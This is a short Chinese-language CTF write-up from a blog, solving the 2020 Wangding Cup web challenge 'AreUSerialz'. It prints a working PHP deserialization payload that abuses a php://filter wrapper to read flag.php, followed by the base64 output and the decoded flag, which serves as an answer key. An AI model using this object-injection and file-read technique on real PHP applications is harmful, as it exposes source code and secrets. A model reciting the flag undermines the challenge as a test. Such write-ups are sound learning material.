【2020年第二届“网鼎杯”网络安全大赛 青龙组】Web AreUSerialz

【2020年第二届“网鼎杯”网络安全大赛 青龙组】Web AreUSerialz

http://94b1c2d4231f4b4bb92162d5e89dec8f5817750c48224380.cloudgame2.ichunqiu.com/

进入网址
在这里插入图片描述
PHP反序列化漏洞…

拿到
?str=O:11:“FileHandler”:3:{S:5:"\00*\00op";i:2;S:11:"\00*\00filename";s:62:“php://filter/convert.base64-encode/resource=/web/html/flag.php”;S:10:"\00*\00content";s:3:“aaa”;}

playload

直接在URL后面输入:
?str=O:11:“FileHandler”:3:{S:5:"\00*\00op";i:2;S:11:"\00*\00filename";s:62:“php://filter/convert.base64-encode/resource=/web/html/flag.php”;S:10:"\00*\00content";s:3:“aaa”;}

在这里插入图片描述

之后会出现:
[Result]:
PD9waHAKCiRmbGFnID0gImZsYWd7Y2I0MjYyNTctMTNkMC00NWVhLTkzMDEtYzRjMjAxMWUzYTc3fSI7Cg==
在这里插入图片描述
复制
PD9waHAKCiRmbGFnID0gImZsYWd7Y2I0MjYyNTctMTNkMC00NWVhLTkzMDEtYzRjMjAxMWUzYTc3fSI7Cg==

去BASE64加密解密网址:
https://base64.supfree.net/

粘贴–>BASE64解密
在这里插入图片描述

解密内容为:

<?php

$flag = "flag{cb426257-13d0-45ea-9301-c4c2011e3a77}";
flag{cb426257-13d0-45ea-9301-c4c2011e3a77}
艺博东 CSDN认证博客专家 网络 路由交换
写博客的初衷:学习、怕学了之后很快会忘记,所以及时的做总结,便于以后用到的时候可以快速查阅,也为其积累经验。
CSDN博客专家,CSDN内容合伙人。
微信公众号:艺博东
关注后,回复关键字“简历”,即可领取简历模板大全;更多干货等你来领取。
已标记关键词 清除标记
©️2020 CSDN 皮肤主题: 博客之星2020 设计师:CY__ 返回首页